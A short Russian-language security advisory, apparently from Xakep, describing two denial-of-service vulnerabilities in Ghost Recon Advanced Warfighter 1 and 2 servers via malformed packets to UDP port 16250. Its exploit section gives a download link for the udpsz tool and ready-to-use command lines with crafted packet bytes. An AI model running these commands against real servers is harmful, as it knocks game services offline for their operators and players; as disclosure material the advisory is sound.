Xakep #305. Многошаговые SQL-инъекции
Программа:
Ghost Recon Advanced Warfighter 1.x
Ghost Recon Advanced Warfighter 2 1.x
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему.
1) Уязвимость существует из-за ошибки работы со знаковыми числами при
обработке сетевых пакетов. Атакующий может передать специально сформированные
пакеты на порт 16250/UDP, что приведет к отказу системы в обслуживании.
2) Уязвимость существует из-за ошибки индексирования массивов при обработке
сетевых пакетов. Атакующий может передать специально сформированные пакеты на
порт 16250/UDP, что приведет к отказу системы в обслуживании.
Эксплоит:
http://aluigi.org/testz/udpsz.zip
1) udpsz -C "0100 13 0003 0000 ffffffff" -b 0x41 SERVER 16250 3000
2) udpsz -C "0100 0d" -X 3 8 l 0 -l 50 -b 0x41 SERVER 16250 3000 или udpsz -C
"0100 0e" -X 3 8 l 0 -l 50 -b 0x41 SERVER 16250 3000
